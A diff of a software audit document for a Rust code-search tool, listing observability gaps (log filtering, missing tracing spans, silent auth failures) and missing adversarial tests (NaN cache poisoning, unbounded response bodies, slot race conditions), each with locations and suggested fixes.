+#### OB-V1.30-1: Default subscriber drops EVERY `info_span!` event — no spans render at default log level
 - **Difficulty:** easy
-- **Location:** `src/serve/data.rs:452` (`build_chunk_detail`), `src/serve/data.rs:933` (`build_stats`)
-- **Description:** `serve/data.rs` exposes five public `build_*` functions invoked from axum handlers via `spawn_blocking`. Three of them (`build_graph:198`, `build_hierarchy:592`, `build_cluster:829`) open a `tracing::info_span!` at entry with useful fields. The remaining two — `build_chunk_detail` and `build_stats` — open no span and emit no tracing at all. `build_chunk_detail` runs 5+ distinct SQL queries including a blocking `rt.block_on(...)`. If any one fails, the `ServeError::Store` warn in `error.rs:50` fires without the chunk_id that triggered it, and `build_stats` has no trace at all if the 4 COUNT queries stall. Latency debugging for `/api/chunk/:id` and `/api/stats` is therefore blind.
-- **Suggested fix:** In `build_chunk_detail`, add `let _span = tracing::info_span!("build_chunk_detail", chunk_id = %chunk_id).entered();` after the signature. In `build_stats`, add `let _span = tracing::info_span!("build_stats").entered();`. Matches the pattern used by the other three `build_*` functions.
+- **Location:** `src/main.rs:14-32`
+- **Description:** The default `EnvFilter` is `"warn,ort=error"`, but every span in the codebase (~150 sites) is `tracing::info_span!` (INFO) or `tracing::debug_span!`. Under default settings none of these match the filter, so the subscriber emits nothing for them. `fmt::init()` also never calls `.with_span_events(FmtSpan::CLOSE)` (or `NEW | CLOSE`), so even if INFO were enabled, span boundaries would not produce log lines on entry/exit — only events emitted *inside* the span would. Consequence: a user running `cqs index` with default config sees no per-batch progress, no SPLADE timing, no UMAP rows-projected count from spans alone — the heavy investment in span instrumentation across `scout`, `gather`, `serve`, `cache`, `slot`, parser, store, and embedder is invisible until someone discovers `--verbose` or `RUST_LOG=info`. There is no runtime way to trace one `cqs serve` request end-to-end without rebuilding the process. Operators of the daemon (`cqs watch --serve`) hit this hardest because the systemd unit inherits empty `RUST_LOG`.
+- **Suggested fix:** (a) Bump default to `"cqs=info,warn"` (cqs's own crate at INFO, world at WARN) so existing spans render without third-party noise. (b) Configure span events: `tracing_subscriber::fmt().with_span_events(tracing_subscriber::fmt::format::FmtSpan::CLOSE).with_env_filter(filter)…` so close events emit `latency_ms` automatically. (c) Add a `--log-format=json` flag (and `CQS_LOG_FORMAT=json`) wired to `.json()` on the fmt builder, so daemon journals are structurally consumable.
 
-#### `cmd_project` span doesn't record the subcommand dispatched (register / list / remove / search)
+#### OB-V1.30-2: `auth::enforce_auth` rejects 401 silently — no `tracing::warn!` on auth failure
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/project.rs:75`
-- **Description:** The entry span is `tracing::info_span!("cmd_project")` — no fields. All four subcommands (`Register`, `List`, `Remove`, `Search`) run inside the same undifferentiated span, so journal output for `cqs project search foo` and `cqs project list` is indistinguishable after the entry line. `Search` additionally initializes an `Embedder` and calls `search_across_projects` — the span should record which action was taken and, for Search, the query + limit. Currently nothing distinguishes a no-op `List` from a 5-second cross-project search in the journal.
-- **Suggested fix:** Replace the single entry span with a match-scoped span, e.g. `let _span = match subcmd { ProjectCommand::Register { name, .. } => tracing::info_span!("cmd_project_register", name = %name).entered(), ProjectCommand::List => tracing::info_span!("cmd_project_list").entered(), ProjectCommand::Remove { name } => tracing::info_span!("cmd_project_remove", name = %name).entered(), ProjectCommand::Search { query, limit, .. } => tracing::info_span!("cmd_project_search", query = %query, limit).entered(), };` Alternatively keep one `cmd_project` span but record `action` and subcommand-specific fields via `span.record(...)`.
+- **Location:** `src/serve/auth.rs:194-232` (specifically `AuthOutcome::Unauthorized` branch at lines 224-230)
+- **Description:** The new per-launch token middleware (#1118, SEC-7) emits zero log output when a request fails authentication. A brute-force scan, expired bookmark, or misconfigured client gets a generic `401 Unauthorized` body and the operator has no journal trail showing it happened, the path attempted, or the source. Asymmetric with `enforce_host_allowlist` at `src/serve/mod.rs:246`, which DOES emit `tracing::warn!(host = %host, "serve: rejected request with disallowed Host header")`. Auth failures are the higher-value signal — host-allowlist failures are usually misconfiguration, while auth failures are the canonical "someone is probing" event.
+- **Suggested fix:** Inside the `AuthOutcome::Unauthorized` arm at `src/serve/auth.rs:224`, before returning the 401 response, emit:
+  ```rust
+  tracing::warn!(
+      method = %req.method(),
+      path = %req.uri().path(),
+      "serve: rejected unauthenticated request",
+  );
+  ```
+  Do NOT log token candidates — even truncated.
 
-#### `hnsw::persist::verify_hnsw_checksums` uses format-interpolated `tracing::warn!` instead of structured field
-- **Difficulty:** easy
-- **Location:** `src/hnsw/persist.rs:136`
-- **Description:** `tracing::warn!("Ignoring unknown extension in checksum file: {}", ext)` interpolates `ext` into the message. Every other warn in the file uses the structured `field = value` form. Structured fields enable filtering (`journalctl ... | jq 'select(.ext == "hnsw.foo")'`) — the interpolated form forces regex. This function is on the self-heal checksum verify path; when an attacker (or bit rot) manages to drop an unexpected extension in the checksum file, the operator has to grep the message text rather than query a field.
-- **Suggested fix:** Change to `tracing::warn!(ext = %ext, "Ignoring unknown extension in checksum file");`.
-
-#### `serve` axum handlers log entry but never log completion — no latency trace for API requests
+#### OB-V1.30-3: Per-request span (TraceLayer) and `build_*` spans are disconnected because `tokio::task::spawn_blocking` doesn't propagate span context
 - **Difficulty:** medium
-- **Location:** `src/serve/handlers.rs:77-242` (`stats`, `graph`, `chunk_detail`, `search`, `hierarchy`, `cluster_2d`)
-- **Description:** Each handler emits a single `tracing::info!` at entry (e.g. `"serve::stats"`, `"serve::graph"`). None wrap the body in a span and none log completion. Latency and error-path diagnosis for the web UI requires either (a) an external reverse proxy's access log, or (b) reading axum's tower middleware output, neither of which is configured by default in `serve::mod.rs`. When a user reports "the cluster view takes 10s to load", the journal shows no signal — not even whether the request hit `/api/cluster/2d` at all, let alone how long `build_cluster` took. Contrast with `cli/watch.rs:62` where `daemon_query` wraps the whole span and emits `cmd_duration_ms` on exit.
-- **Suggested fix:** Wrap each handler body in a `tracing::info_span!("serve_<name>", <params>)` so the downstream `build_*` spans nest under it, and add an `.instrument(span)` on the `spawn_blocking` await if preserving span across tokio boundaries. Alternatively add `tower_http::trace::TraceLayer` to `build_router` in `serve/mod.rs:97` which gives latency + status code per request for free.
+- **Location:** `src/serve/handlers.rs:86, 111, 131, 160, 210, 236` (every `spawn_blocking` call)
+- **Description:** The serve router wires `TraceLayer::new_for_http()` (`src/serve/mod.rs:195`) which generates a per-request span (fixes OB-V1.29-5 at the request level). Each handler then spawns its blocking work via `tokio::task::spawn_blocking(move || super::data::build_graph(…))`. The closure runs on a fresh blocking-pool thread which has NO span stack inherited from the caller — `tokio` does not propagate `tracing::Span::current()` into spawn_blocking by default. Inside `build_graph`/`build_chunk_detail`/`build_hierarchy`/`build_cluster`/`build_stats`, the `info_span!` becomes a fresh root span. A JSON capture of one request shows two unrelated trees: TraceLayer's `http_request{method=GET path=/api/graph}` and a separately-rooted `build_graph{file_filter=…}`. Once OB-V1.30-1 is fixed and INFO spans render, the noise will be doubled with no parent linkage.
+- **Suggested fix:** Capture `tracing::Span::current()` before the spawn and `instrument` the closure:
+  ```rust
+  use tracing::Instrument;
+  let span = tracing::Span::current();
+  let stats = tokio::task::spawn_blocking({
+      let store = state.store.clone();
+      move || {
+          let _entered = span.enter();
+          super::data::build_stats(&store)
+      }
+  }).await…
+  ```
+  Apply at all six handlers (stats/graph/chunk_detail/search/hierarchy/cluster_2d). Alternative: drop the per-handler `tracing::info!` lines (80, 100, 126, 149, 175, 201, 231) and rely solely on the inner `build_*` span entry — they're redundant once the inner span emits CLOSE events.
 
-#### `classify_query` / `reclassify_with_centroid` lack entry span — routing decisions not traceable for a given query
+#### OB-V1.30-4: `cqs eval` runner uses `eprintln!` for progress instead of `tracing::info!`
 - **Difficulty:** easy
-- **Location:** `src/search/router.rs:561` (`classify_query`), `src/search/router.rs:1093` (`reclassify_with_centroid`)
-- **Description:** `classify_query` (1549 lines of routing logic) decides which embedder path a query takes (DenseDefault vs DenseBase vs NameOnly vs DenseWithTypeHints). It's called from every search entry point. It has `tracing::info!(centroid_category, margin, "centroid filled Unknown gap")` at line 1116 but no entry span — so when a user asks "why did my query route to DenseBase?", the operator has to grep for the message text and has no correlation id back to the originating `cmd_search`/`cmd_scout`/etc. `resolve_splade_alpha` (P3 OB-NEW-1, triaged but still open — triage shows ✅ wave-1 which may be fixed already) was the sibling issue.
-- **Suggested fix:** Add `let _span = tracing::info_span!("classify_query", query_len = query.len()).entered();` at the top of `classify_query`. At exit add `tracing::debug!(category = %classification.category, confidence = ?classification.confidence, strategy = ?classification.strategy, "Query classified");` so the full routing decision is one journal line. Same treatment for `reclassify_with_centroid` with `tracing::info_span!("reclassify_with_centroid").entered();`.
+- **Location:** `src/cli/commands/eval/runner.rs:163-168`
+- **Description:** The eval runner emits progress (`[eval] 50/109 queries (12.3 q/s)`) via `eprintln!` at line 167. Every other progress signal in the codebase (`build.rs` SPLADE batches at 546, UMAP at `umap.rs:142`, daemon GC at `watch.rs:1217`) uses `tracing::info!` with structured fields. Using `eprintln!`: (a) prevents JSON-redirect of eval output for downstream comparison tooling, (b) fires unconditionally even with `RUST_LOG=error` (no quiet mode), (c) the q/s number can't be filtered or summed from journal logs.
+- **Suggested fix:** Replace line 167 with:
+  ```rust
+  tracing::info!(done, total = total_queries, qps, "eval progress");
+  ```
+  Keep `eprintln!` only behind a `--quiet=false` CLI gate if interactive feedback is required, or rely on the `cqs=info` default after OB-V1.30-1.
 
-#### `verify_hnsw_checksums` silently returns errors on IO failure — no tracing line before wrapping
+#### OB-V1.30-5: `nl/mod.rs` public NL generators have zero spans — generated text shapes the embedding for every chunk
 - **Difficulty:** easy
-- **Location:** `src/hnsw/persist.rs:120-156` (`verify_hnsw_checksums`)
-- **Description:** Every IO failure in this function (read checksum file, open data file, read through hasher) flattens `std::io::Error` into `HnswError::Internal(format!("Failed to read {}: {}", ...))` via `.map_err`. None of these emit a `tracing::warn!` before returning. When a real user hits a permission or FD-exhaustion problem during daemon startup self-heal (this function is called from `build_vector_index_with_config` line 447 on the hot path), the only signal reaching the journal is the eventual `tracing::warn!(error = %e, ...)` at the caller in `cli/store.rs:455` — which shows the flattened String, stripping the `io::ErrorKind`. For transient IO failures (NFS stall, filesystem readonly remount) operators can't tell the kind from the log alone.
-- **Suggested fix:** Add `tracing::warn!(error = %e, path = %path.display(), kind = ?e.kind(), "verify_hnsw_checksums IO failure");` inline before each `.map_err(|e| HnswError::Internal(...))` so the `ErrorKind` reaches the journal even though the wrapped `HnswError` is a plain string.
+- **Location:** `src/nl/mod.rs:43, 65, 189, 209` (`generate_nl_with_call_context`, `generate_nl_with_call_context_and_summary`, `generate_nl_description`, `generate_nl_with_template`)
+- **Description:** None of the four `generate_nl_*` public functions have entry spans, despite being the canonical text-shaping path that determines what every chunk's embedding sees. When eval drops 5pp recall after a model swap, there is no way to bisect from "which NL template rendered which chunk" — an operator has to add spans by hand and rebuild. (The fts/markdown helpers running in tight indexing loops are reasonable to skip; the 4 NL generators are NOT inner-loop, they run once per chunk during enrichment.)
+- **Suggested fix:** Add a single `tracing::debug_span!("generate_nl", template = ?template, chunk_kind = ?chunk.chunk_type, len = chunk.content.len())` at the top of `generate_nl_with_template` (line 209). The other three call into it transitively, so one span covers all four entry points. `debug_span!` (not info) keeps it off by default.
+
+#### OB-V1.30-6: `embed_documents` / `embed_query` lack completion fields — entry span has `count`/`text` but no result.len, dim, time
+- **Difficulty:** easy
+- **Location:** `src/embedder/mod.rs:683, 722`
+- **Description:** Both entry spans are minimal: `info_span!("embed_documents", count = texts.len())` and `info_span!("embed_query")`. There is no "embed_documents complete" event with the produced batch size, embedding dim, or tokenization stats. `FmtSpan::CLOSE` (OB-V1.30-1) would partially fix this, but even with CLOSE events the only structured field would be the entry-time `count`, not output sizes / dim / tokenization stats. Indexing 100k chunks today produces ~200 `embed_batch` enter events and zero "I produced N embeddings of dim D in T ms" events.
+- **Suggested fix:** At the bottom of `embed_documents` (after the loop completes), add:
+  ```rust
+  tracing::info!(
+      total = embeddings.len(),
+      dim = self.embedding_dim(),
+      input_count = texts.len(),
+      "embed_documents complete"
+  );
+  ```
+  Same pattern in `embed_query` at `tracing::debug!` level.
+
+#### OB-V1.30-7: `Reranker::rerank_with_passages` swallows `passages.len() != results.len()` mismatch with no log — silent semantic corruption
+- **Difficulty:** easy
+- **Location:** `src/reranker.rs:200-220`
+- **Description:** `rerank_with_passages` accepts `passages: &[&str]` independent of `results: &mut Vec<SearchResult>`. The doc says "passages must have the same length as results" but the implementation does not assert, log, or take a tracing event when the lengths diverge. If a caller mis-zips (e.g. filters results post-fetch but forgets to re-trim passages), `compute_scores` either panics on out-of-bounds slicing or scores arbitrarily-paired text, and the operator sees nothing in the journal. Semantically silent: ranks shift, neither error nor warning fires.
+- **Suggested fix:** At line 213 (after the entry span, before the early-return), add:
+  ```rust
+  if passages.len() != results.len() {
+      tracing::warn!(
+          passages = passages.len(),
+          results = results.len(),
+          "rerank_with_passages: length mismatch — caller bug, results will be corrupted",
+      );
+      return Err(RerankerError::InvalidArguments(format!(
+          "passages.len()={} != results.len()={}",
+          passages.len(),
+          results.len()
+      )));
+  }
+  ```
+  Add the `InvalidArguments` variant if it doesn't exist; warn-only also acceptable but less safe.
+
+#### OB-V1.30-8: `train_data` git subprocess wrappers don't log non-zero exit codes — silent failure on shallow clones / missing SHAs
+- **Difficulty:** easy
+- **Location:** `src/train_data/git.rs:65-242` (`git_log`, `git_diff_tree`, `git_show`)
+- **Description:** Each function has an entry `tracing::info_span!` (good), but on `output.status.success()` failure the exit code and stderr are bundled into a `TrainDataError` and returned — no structured log. When `cqs train-data --max-commits 1000` walks a shallow repo and 50% of `git_diff_tree` calls fail with `fatal: bad revision`, the user sees a single aggregated count at the end and has no way to reconstruct WHICH SHAs failed without re-running with `RUST_LOG=trace`. The `is_shallow` probe at line 241 is the only one that handles a missing-SHA case gracefully.
+- **Suggested fix:** In each subprocess wrapper, on `!output.status.success()` add before the error return:
+  ```rust
+  tracing::warn!(
+      sha,
+      exit = output.status.code(),
+      stderr = %String::from_utf8_lossy(&output.stderr).trim(),
+      "git_diff_tree failed",
+  );
+  ```
+  Apply consistently to `git_log` (line 65), `git_diff_tree` (line 131), `git_show` (line 173).
+
+#### OB-V1.30-9: Format-string-interpolated `tracing::info!` calls — structural fields are lost
+- **Difficulty:** easy
+- **Location:** `src/hnsw/build.rs:78, 236`; `src/hnsw/persist.rs:210, 638, 771`; `src/reference.rs:220`; `src/cli/commands/train/export_model.rs:76`; `src/audit.rs:85, 93`; `src/embedder/provider.rs:149`
+- **Description:** OB-V1.29-4 specifically called out `verify_hnsw_checksums` for this pattern; the audit fixed that one site but the broader pattern persists across HNSW build/persist and several other modules. Lines like `tracing::info!("Building HNSW index with {} vectors", nb_elem)` produce a single rendered string instead of structured `count = nb_elem` fields. Once OB-V1.30-1 lands JSON formatting, these lines remain un-queryable: jq-extracting the vector count from "Building HNSW index with 178432 vectors" needs a regex per line, while `count: 178432` is a JSON field. Friction with no offsetting benefit — `tracing` natively supports both forms.
+- **Suggested fix:** Convert each site to structured form. Examples:
+  ```rust
+  // src/hnsw/build.rs:78
+  tracing::info!(count = nb_elem, "Building HNSW index");
+  // src/hnsw/persist.rs:210
+  tracing::info!(dir = %dir.display(), basename, "Saving HNSW index");
+  ```
+  Sweep the 9 sites in one pass. Pure-mechanical change, no behavior delta.
+
+#### OB-V1.30-10: `cqs serve` cluster_2d emits no warn when corpus has chunks but zero UMAP rows — operators see only the empty payload
+- **Difficulty:** easy
+- **Location:** `src/serve/data.rs:901, 1020` (`build_cluster`); handler at `src/serve/handlers.rs:227-242`
+- **Description:** When the user runs `cqs serve` against a corpus indexed without `cqs index --umap` (the v1.30.0 schema-v22 default — UMAP is opt-in), the cluster-3d view returns `{nodes: [], skipped: N}` with N = total chunks. The frontend renders a "run cqs index --umap" hint (per the doc comment at handlers.rs:226), but the backend emits no `tracing::warn!` to surface this state in the journal — the operator who runs `cqs serve` over SSH and gets a blank cluster view has no log to point at. Neighboring `build_hierarchy` at `data.rs:638` DOES log `tracing::info!(root_id, "build_hierarchy: root chunk not found")` for its empty-result case.
+- **Suggested fix:** At the point inside `build_cluster` where `coords` is empty but `total_chunks > 0`, add:
+  ```rust
+  if response.nodes.is_empty() && response.skipped > 0 {
+      tracing::warn!(
+          skipped = response.skipped,
+          "build_cluster: corpus has chunks but no UMAP coordinates — run `cqs index --umap`",
+      );
+  }
+  ```
 
 ---
+
+## Triage notes
+
+- **OB-V1.30-1** is the highest-leverage finding — fixing it unlocks the value of every span already in the codebase. P1 by impact, easy by effort.
+- **OB-V1.30-2** is the only one tied directly to the new auth surface (#1118); SEC-7 shipped without the warn-on-reject side, so the security event is silent.
+- **OB-V1.30-3** is the only "medium" — it requires understanding tokio's blocking-pool span propagation. The other nine are all easy.
+- **OB-V1.30-9** is bundled because the prior audit (OB-V1.29-4) only patched one site of an idiomatic-but-stale pattern that persists across ~9 lines.
+- I did NOT report module-wide gaps in `scout`, `where_to_add`, `gather`, `staleness`, `impact`, or `slot`/`cache`/`serve` — every public function in those modules now has an entry span, confirming the v0.12.1 lesson has been applied. The current observability bar in cqs is high; the remaining gaps are at the rendering / correlation / completeness edges, not the "no spans exist" tier.
+
 
 ## Test Coverage (adversarial)
 
-#### TC-ADV-1.29-1: `normalize_l2` silently returns NaN/Inf for non-finite input — no test
-- **Difficulty:** easy
-- **Location:** `src/embedder/mod.rs:1023-1030` (definition). Tests live at `src/embedder/mod.rs:1200-1233`. Suggested new tests in the same module.
-- **Description:** `normalize_l2` is called on every raw ORT output (`src/embedder/mod.rs:911`) and receives whatever the model produces. If any element is NaN, `norm_sq = v.iter().fold(0.0, |acc, &x| acc + x * x)` becomes NaN, the `norm_sq > 0.0` check is false, and the original NaN values are returned unchanged. If any element is +Inf, `norm_sq = Inf`, `inv_norm = 1.0/Inf = 0.0`, and the returned vector is all zeros — silently blanked. Neither case is tested today (existing tests cover unit-vector, 3-4-5, zero, empty). The HNSW search path has a NaN guard (`src/hnsw/search.rs:82`) but the `search_filtered` brute-force path, reranker path, and neighbors path all consume these embeddings without a guard — a degenerate ONNX output silently corrupts search results.
-- **Suggested fix:** Add three tests in the existing `tests` module:
-  - `test_normalize_l2_nan_propagates` — `normalize_l2(vec![1.0, f32::NAN, 0.0])` — pin current behavior (NaN out) OR change the contract to fail. Either way, don't leave it untested.
-  - `test_normalize_l2_inf_collapses_to_zero` — `normalize_l2(vec![1.0, f32::INFINITY, 2.0])` — pin the current Inf → 0-vec collapse.
-  - `test_normalize_l2_neg_inf` — same for `f32::NEG_INFINITY`.
+Audit scope: v1.30.0. Skipped findings already triaged in `docs/audit-triage-v1.30.0.md` (the v1.29.0 carryover triage). Focus is on surfaces *added or substantially changed* in v1.29.1..v1.30.0 — slots/cache (#1105), local LLM provider (#1101), per-launch serve auth (#1118), non-blocking HNSW rebuild (#1113), `nomic-coderank` preset (#1110), execution-provider feature split (#1120) — plus pre-existing untested adversarial paths.
 
-#### TC-ADV-1.29-2: `embed_batch` does not validate ORT-returned tensor for NaN/Inf before returning `Embedding`
+#### TC-ADV-1.30-1: `LocalProvider` body-size DoS — `body_preview` and `parse_choices_content` both buffer entire HTTP response before truncating
 - **Difficulty:** medium
-- **Location:** `src/embedder/mod.rs:903-914` (the pooled→normalized→Embedding::new path). No existing test covers the "model emits NaN" case.
-- **Description:** `Embedding::try_new` rejects non-finite values, but `embed_batch` uses `Embedding::new(normalize_l2(v))` (line 911), which is the unchecked constructor. Combined with the `normalize_l2` NaN/Inf passthrough above, a broken ONNX model (observed in: quantization bugs, model-weight bit rot, corrupt model download with matching checksum, FP16 overflow on long inputs) produces `Embedding` values that flow through `embed_query` → query cache → HNSW search → brute-force scoring with no canary. `is_finite` is checked at HNSW search (line 82) — but the disk cache `QueryCache::put` (`src/cache.rs:1227`) stores the NaN embedding to disk, poisoning future queries across processes.
-- **Suggested fix:** Add a test that monkey-patches a pooling result with a NaN element, then asserts `embed_batch` either (a) errors, or (b) produces a finite embedding — whichever is the chosen contract. Specifically:
-  - `test_embed_batch_rejects_nan_pool_output` via a trait/mock or by poking a `normalize_l2` call path; assert `Result::Err(EmbedderError::InferenceFailed(_))` or similar.
-  - In parallel, add `test_query_cache_put_rejects_non_finite_embedding` in `src/cache.rs` so even if embedder is misbehaving, the cache layer is a backstop.
+- **Location:** `src/llm/local.rs:474-488` (`parse_choices_content`), `src/llm/local.rs:490-500` (`body_preview`). Tests in `src/llm/local.rs:595+`.
+- **Description:** `parse_choices_content` calls `resp.json::<Value>()` which reads the entire response body into memory before parsing. `body_preview` calls `resp.text()` which does the same, then char-truncates to 256 bytes. The `reqwest::blocking::Client` constructed at `src/llm/local.rs:97-100` sets `timeout` and `redirect` only — there is **no body-size limit**. A misconfigured / hostile / panicked OpenAI-compat server (or any server reachable at the configured `api_base`) can return an arbitrarily large 200-OK or 4xx body and OOM the daemon's blocking-pool thread. The local LLM concurrency knob clamps at 64, so up to 64 concurrent unbounded reads can race for memory before any one completes. Existing test `long_response_not_truncated` at `:826-847` only exercises the 100 KB happy path and *requires* the full body to come through — locking in the unbounded read as a contract.
+- **Suggested fix:** Add to the `tests` module in `src/llm/local.rs`:
+  - `test_oversized_response_body_capped_at_5mb` — mock a 200-OK with a 50 MB JSON body; assert the worker either errors out (preferred) or reads at most a documented cap (e.g. 5 MB). Implementation: wrap the response with `Response::bytes_stream` / `take` or set `reqwest::Client::builder().…response_body_limit(…)` (helper exists via `read_to_end_with_limit`).
+  - `test_4xx_with_large_body_does_not_buffer_entire_body` — mock a 400 with a 50 MB body; assert `body_preview` returns ≤ 256 bytes *and* never allocates more than e.g. 4 KB by checking with a tracking allocator or measuring `resp.bytes_stream().next().await`.
+  - Recommended alongside: cap response body via `reqwest::Body::limit` or `Response::bytes_stream` chunking. Without a fix, an A6000 box's 64-thread blocking pool × N-MB body = trivial OOM crater.
 
-#### TC-ADV-1.29-3: Daemon socket handler — zero adversarial tests for request shapes
+#### TC-ADV-1.30-2: `EmbeddingCache::write_batch` and `QueryCache::put` accept NaN/Inf embeddings — cross-process cache poisoning
+- **Difficulty:** easy
+- **Location:** `src/cache.rs:332-407` (`EmbeddingCache::write_batch`), `src/cache.rs:1677-1699` (`QueryCache::put`). Tests in the `tests` mod (`src/cache.rs:756+`) and `shared_runtime_tests` (`:1748+`).
+- **Description:** `write_batch` validates `embedding.len() == dim` and `!embedding.is_empty()` (lines 360-373) but never checks `embedding.iter().all(|f| f.is_finite())`. Same hole in `QueryCache::put` (line 1677): bytes are flat-mapped from `embedding.as_slice()` and inserted with no finiteness check. Once a poisoned NaN/Inf entry lands on disk, *every subsequent process* that reuses the project's `embeddings_cache.db` (now project-scoped per #1105 — so cross-slot too) reads it back via `read_batch` (line 282-296) which also does not gate on finiteness, and the corrupt floats flow into HNSW search (which has a `is_finite` guard at `src/hnsw/search.rs:82`) and the brute-force / reranker scoring paths (which mostly do not). #1105 made this *worse* by making the cache long-lived per-project (was per-build before): a single bad embedder run permanently poisons the cache until the user runs `cqs cache prune`.
+  - Triage note: TC-ADV-1.29-1 / TC-ADV-1.29-2 (P3) called this out at the embedder boundary; this is the *cache* boundary, which is independent and currently the only line of defense if a future embedder swap (Phase B/C of #956 — CoreML/ROCm) happens to ship NaN-on-overflow behavior different from CUDA today.
+- **Suggested fix:** In `src/cache.rs::tests`:
+  - `test_write_batch_rejects_nan_embedding` — write `vec![1.0, f32::NAN, 0.5, …]`; assert it is either dropped with a `tracing::warn!` or returned as a 0-count, and that a subsequent `read_batch` returns no row for that hash.
+  - `test_write_batch_rejects_inf_embedding` — same for `f32::INFINITY` / `f32::NEG_INFINITY`.
+  - `test_query_cache_put_rejects_non_finite` — sibling test in `query_cache_tests` (or a new mod). Build an `Embedding` via `Embedding::new` (the unchecked path; `try_new` already rejects), `put` it, then `get` it and assert the embedding either does not appear or comes back as a documented sentinel.
+  - Implementation should sit alongside the existing `embedding.len() != dim` warn/skip blocks: one extra `if embedding.iter().any(|f| !f.is_finite())` early-skip with a `tracing::warn!` carrying the hash prefix.
+
+#### TC-ADV-1.30-3: `slot_create` / `slot_remove` TOCTOU — concurrent slot operations corrupt `.cqs/slots/<name>/`
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:160-406` (`handle_socket_client`). Tests start at line 2637, but none of them exercise `handle_socket_client`. Integration tests in `tests/daemon_forward_test.rs` only cover the CLI→daemon happy path (notes list, ping).
-- **Description:** The daemon socket is the hot path for every agent query and has rich adversarial surface. None of the following are tested:
-  - **1 MiB boundary**: request exactly 1,048,577 bytes should produce `"request too large"` error (logic at `src/cli/watch.rs:198-207`).
-  - **Malformed JSON**: trailing garbage after a valid object, UTF-16 BOM prefix, JSON with NaN literals (`{"command":"ping","args":[]}NaN`), empty line, whitespace only.
-  - **Missing `command` field**: `{"args":[]}` should produce `"missing 'command' field"` (line 304-312).
-  - **Non-string args**: `{"command":"notes","args":[{}, null, 42]}` — rejects with `"args contains non-string elements"` (line 248-263). Today this is only covered structurally by code review.
-  - **Oversized single arg**: `{"command":"search","args":["<500KB of base64>"]}` — within 1 MiB line but exhausts memory downstream.
-  - **NUL byte in args**: the batch path validates NUL bytes (`src/cli/batch/mod.rs:579`) — but `handle_socket_client` relies on `dispatch_line` downstream to catch this; no integration test pins that boundary.
-  - **Notes secret-redaction**: `{"command":"notes","args":["add","secret text"]}` — the log line should show `notes/add` (line 279-285), not the full arg. Regression risk that isn't test-pinned.
-- **Suggested fix:** Create `tests/daemon_adversarial_test.rs`. Wire up a fixture that constructs `BatchContext` + runs `handle_socket_client` against a `UnixStream` pair (the existing `MockDaemon` in `tests/daemon_forward_test.rs` is the wrong shape — that's a mock daemon for the CLI; we need the reverse). Add one test per case above; assert response envelope matches expected error code or payload. A NUL-byte-in-args case should verify the client receives an invalid-input error rather than the command being executed with a mangled string.
+- **Location:** `src/cli/commands/infra/slot.rs:219-266` (`slot_create`), `:299-350` (`slot_remove`). Tests at `:391-516` cover sequential happy paths only.
+- **Description:** Two scenarios with no test today:
+  1. **Concurrent `cqs slot create foo`**: line 224 checks `dir.exists()`, line 233 calls `fs::create_dir_all(&dir)` (idempotent — does not fail). Both processes proceed past the existence check, both write `slot.toml` via `write_slot_model`. The second writer wins via the temp+rename atomicity inside `write_slot_model`, but both processes report success and the user has no signal that one was a no-op.
+  2. **`cqs slot remove foo` racing `cqs index --slot foo`**: `slot_remove` calls `fs::remove_dir_all(&dir)` (line 335) without any lock. The indexer holds an open SQLite connection on `slot/foo/index.db`; on Linux the unlinking of in-use files is silent (Windows would error). The indexer continues writing to phantom inodes and, on next open, sees an empty slot. Worse: the auto-promotion at line 331 (`write_active_slot(…, &all[0])`) can flip the active pointer mid-index, so `cqs search` after the remove starts hitting an unrelated slot.
+  3. **`cqs slot remove`** while daemon is serving from that slot: daemon's read-only `Store` keeps the file alive on Linux but the on-disk directory is gone — the daemon's HNSW save path (any `set_hnsw_dirty` write) silently writes to a deleted-but-open inode. After daemon restart the slot is gone.
+- **Suggested fix:** Add to `src/cli/commands/infra/slot.rs::tests`:
+  - `test_slot_create_concurrent_same_name` — spawn 2 threads racing `slot_create(…, "foo", Some("bge-large"), …)`, then `slot_create(…, "foo", Some("e5-base"), …)`; assert at most one returns `Ok` *or* the slot ends up with a deterministic model (whichever contract is chosen).
+  - `test_slot_remove_during_open_index_db` — open `index.db` via `Store::open_readonly_pooled`, then call `slot_remove` from another thread; assert the open store either keeps working OR the remove returns an error (currently neither is guaranteed).
+  - Recommend adding `flock` on `<slot>/index.db.lock` (or a new `slot.lock` in `.cqs/slots/<name>/`) acquired by both `slot_remove` and the indexer, so the second to-arrive blocks or errors instead of corrupting.
 
-#### TC-ADV-1.29-4: `parse_unified_diff` has no test for empty-file / whitespace-only hunk headers / duplicate `+++` lines
-- **Difficulty:** easy
-- **Location:** `src/diff_parse.rs:33-108` (definition), tests at `tests/diff_parse_test.rs` + `src/diff_parse.rs:110-237`.
-- **Description:** Existing tests cover basic, new-file, deleted, binary, multiple hunks, count-omitted, empty, rename, u32-overflow, no-b-prefix. Missing:
-  - **Two `+++` lines in a row without any hunk headers between them** — current code just overwrites `current_file` and does not warn; a diff like `+++ b/a.rs\n+++ b/b.rs\n@@ -1 +1 @@\n+x` will attribute the hunk to `b/b.rs` silently. Pin this behavior or reject.
-  - **`@@` hunk header before any `+++` line** — dropped on the floor because `current_file = None`. No test.
-  - **Only-whitespace diff input** (`"   \n\n\n"`) — currently returns empty Vec (via `lines()`) but not pinned.
-  - **Hunk header with extra spaces inside** (`@@  -10,3  +10,5  @@`) — regex `\+(\d+)` requires exactly one space before `+`; the parser will silently drop the hunk. Not tested.
-  - **CRLF-only line endings in middle of diff** (mixed with LF) — the `contains('\r')` check normalizes all `\r` to `\n`, but mid-hunk `\r` in the `+ line content` would double-normalize and change byte positions. Not tested.
-- **Suggested fix:** Add to `tests/diff_parse_test.rs`:
-  - `test_parse_unified_diff_double_plus_plus_line_uses_last` — pin last-wins behavior.
-  - `test_parse_unified_diff_orphan_hunk_header_dropped` — hunk without preceding file is dropped.
-  - `test_parse_unified_diff_hunk_header_extra_spaces` — pin current drop-on-floor behavior.
-  - `test_parse_unified_diff_whitespace_only_input` — returns empty.
-
-#### TC-ADV-1.29-5: `parse_notes_str` — no test for malformed TOML escapes, non-ASCII text, or oversized mentions array
-- **Difficulty:** easy
-- **Location:** `src/note.rs:325-348`. Existing tests cover happy path, clamping (not NaN — TC-ADV-6 in triage), empty file, stable IDs, MAX_NOTES truncation, proptest no-panic on 500-byte random input.
-- **Description:** `parse_notes_str` accepts user-authored TOML. The proptest fuzz (`\\PC{0,500}`) won't hit these:
